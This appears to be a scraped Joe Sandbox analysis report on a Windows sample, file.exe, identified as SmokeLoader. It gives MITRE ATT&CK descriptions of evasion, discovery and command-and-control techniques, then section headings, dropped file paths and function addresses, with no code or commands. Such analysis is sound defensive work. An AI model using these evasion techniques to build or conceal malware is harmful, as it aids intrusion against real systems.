Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: SmokeLoader

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\fbtdajh

C:\Users\user\AppData\Roaming\fbtdajh:Zone.Identifier

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Suricata IDS Alerts

Windows Analysis Report
file.exe

Function 004173E0 Relevance: 38.8, APIs: 20, Strings: 2, Instructions: 269
filelibrarypipeCOMMON

Function 00401514 Relevance: 10.7, APIs: 7, Instructions: 201
nativeCOMMON

Function 004014FE Relevance: 10.7, APIs: 7, Instructions: 180
nativeCOMMON

Function 00401542 Relevance: 10.7, APIs: 7, Instructions: 167
nativeCOMMON

Function 00401549 Relevance: 10.7, APIs: 7, Instructions: 164
nativeCOMMON

Function 00401557 Relevance: 10.7, APIs: 7, Instructions: 162
nativeCOMMON

Function 00402F97 Relevance: 3.2, APIs: 2, Instructions: 172
nativethreadCOMMON

Function 02C200B4 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Function 0479003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Function 004176A3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65
libraryCOMMON

Function 00417050 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63
librarymemoryloaderCOMMON

Function 04790E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Function 004018E6 Relevance: 1.3, APIs: 1, Instructions: 63
sleepCOMMON

Function 00401915 Relevance: 1.3, APIs: 1, Instructions: 59
sleepCOMMON

Function 004018F1 Relevance: 1.3, APIs: 1, Instructions: 55
sleepCOMMON